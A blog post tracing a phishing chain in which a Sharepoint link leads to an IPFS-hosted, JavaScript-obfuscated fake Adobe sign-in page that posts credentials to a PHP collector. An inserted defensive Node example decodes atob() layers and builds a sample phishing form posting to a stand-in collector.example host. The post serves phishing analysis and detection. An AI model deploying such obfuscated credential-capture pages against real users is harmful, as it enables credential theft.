The chain of landing web pages that I saw for a phish spam today

April 12, 2023

Over on the Fediverse, I shared a phish-related discovery:

Today's discovery: people hosting phish landing forms in IPFS and using Cloudflare's IPFS gateway to do the work of web access to them. Nicely played. Everyone is going to point fingers at everyone else.

(As usual the email has a different URL, with a 'this is our secure document link' that takes you to the IPFS hosted form.)

Let's be a little bit more specific, because it's a useful example of just how complicated these things can be.

The email was a 'X has shared a file with you' email with a link to a page on what claimed to be a travel company's Sharepoint aka OneNote site (under '<...>-my.sharepoint.com', which you probably aren't going to be able to block). Based on the URL, this may have been a page created by and for a particular user, instead of a corporate page, meaning that just this user had their Sharepoint access compromised. This page said:

<company> transmitted a secured RFQ itinerary Doc

To view the doc, click the link below

RFQ itinerry

[...]

(The spelling here is authentic.)

That link took you to a cloudflare-ipfs.com URL, which displayed an official looking Adobe 'Verify Your Identity' thing asking you to sign in:

You've received a secure file
[PDF icon] 58.3 Kb

To receive and download this PDF file , please enter specific professional email credentials that this document was sent to.

The contents of this page weren't (visibly) there in the initial HTML page fetched from IPFS; instead, they were created on the fly by encoded Javascript, ensuring that simply fetching and examining the IPFS URL would tell you (or a filtering system) nothing. Fortunately browser developer tools can inspect the resulting dynamically created web page to reveal that it had an embedded form that POST'd the results off to a mybluehost.me .php page. Probably this page then sends the results somewhere else, but that was as far as I felt like going.
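
As an added example (not code from the post or from the phish itself), here is one way to get at the POST target of a page like this without running it in a browser: unwrap the base64 literals handed to `atob()` statically, layer by layer, and then look for `<form action=...>` and `fetch()` targets in every decoded layer. The sample page, its "Adobe" dressing, the `collector.example` domain and `verify.php` file name are all constructed for the example and are not the real phish's URLs; the real page POSTed to a mybluehost.me .php page whose exact address is not given here.

```javascript
// Added example: statically unwrapping a phish landing page whose visible
// HTML is empty and whose real content is built at runtime from base64
// strings passed to atob(). The goal is to find the credential-capture form
// and its POST target without ever executing the page's script.
// Sample page and URLs below are constructed for illustration (hypothetical).

const ATOB_RE = /atob\(\s*(['"])([A-Za-z0-9+\/=\s]+)\1\s*\)/g;
const ACTION_RE = /<form\b[^>]*\baction\s*=\s*(['"])([^'"]+)\1/gi;
const FETCH_RE = /\bfetch\(\s*(['"])([^'"]+)\1/g;

// Form actions visible in a document as-is (no decoding at all). On the
// kind of page described above this returns nothing.
function findFormActions(html) {
  return [...html.matchAll(ACTION_RE)].map((m) => m[2]);
}

// Decode every atob("...") literal in `text`, recursively, since a decoded
// layer may itself contain further atob() calls. Returns every layer,
// starting with the input. `maxDepth` bounds the unwrapping so a hostile
// page cannot keep us busy indefinitely.
function unwrapAtobLayers(text, maxDepth = 8) {
  const layers = [text];
  let frontier = [text];
  for (let depth = 0; depth < maxDepth && frontier.length > 0; depth++) {
    const next = [];
    for (const layer of frontier) {
      for (const m of layer.matchAll(ATOB_RE)) {
        const b64 = m[2].replace(/\s+/g, '');
        const decoded = Buffer.from(b64, 'base64').toString('utf8');
        if (decoded.length > 0) next.push(decoded);
      }
    }
    layers.push(...next);
    frontier = next;
  }
  return layers;
}

// Where would the page send what the victim types? Collect form actions and
// fetch() targets from every decoded layer, deduplicated, in discovery order.
function extractPostTargets(html) {
  const targets = new Set();
  for (const layer of unwrapAtobLayers(html)) {
    for (const url of findFormActions(layer)) targets.add(url);
    for (const m of layer.matchAll(FETCH_RE)) targets.add(m[2]);
  }
  return [...targets];
}

// ---- Constructed sample page (hypothetical domain and file name) ----
// The "real" content: an Adobe-styled sign-in form posting to a PHP collector.
const INNER_FORM =
  "<h2>You've received a secure file</h2>" +
  '<form method="POST" action="https://collector.example/verify.php">' +
  '<input name="email"><input name="password" type="password">' +
  '<button>Sign in</button></form>';
// One extra wrapping layer, since obfuscators commonly stack them.
const LAYER1 =
  'document.write(atob("' + Buffer.from(INNER_FORM).toString('base64') + '"))';
// What a plain fetch of the IPFS URL would return: no form anywhere in sight.
const SAMPLE_HTML =
  '<!DOCTYPE html><html><head><title>Adobe</title></head><body>' +
  '<div id="app"></div>' +
  '<script>eval(atob("' + Buffer.from(LAYER1).toString('base64') + '"))</script>' +
  '</body></html>';

console.log('visible form actions :', findFormActions(SAMPLE_HTML));
console.log('decoded POST targets :', extractPostTargets(SAMPLE_HTML));
```

Run under Node; the first line prints an empty list (the raw HTML really does tell you nothing) and the second prints the collector URL. This only handles the base64/`atob()` pattern; pages built from `String.fromCharCode` arrays, XOR'd strings or the like need their own decoders, and at some point the only general answer is rendering the page in a sandboxed headless browser, which is exactly the cost a gateway will not pay for every object it serves.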

(On the one hand, this is your web browser clearly asking you to authenticate to see a PDF. On the other hand, Adobe has clouded up all its PDF programs, so sure, why not assume that Adobe runs a secure PDF sharing thing for people as part of that.)

My guess is that this level of indirection and cloaking is typical in modern phish spam attempts. Certainly this particular attempt isn't a top-notch effort, although it was good enough to not be discarded out of hand by people here. The use of IPFS feels creative, though, especially with the actual page contents only being created by Javascript. A somewhat cautious IPFS gateway might try to look for bad things in the web page it's about to serve someone, but I don't think anyone is going to run the web page to be served through a Javascript interpreter (nor should they).

(This uses the same idea of 'you must authenticate to view this PDF' but with more steps than the other recent-ish time I've seen this trick. That this bounces you through a website may make it more plausible to people, since having to authenticate to access things for you on the web is not uncommon. It may raise large red flags to technical people who stop to think about the mechanics, but we're not really the target audience for this attack.)

Last modified: Wed Apr 12 21:52:50 2023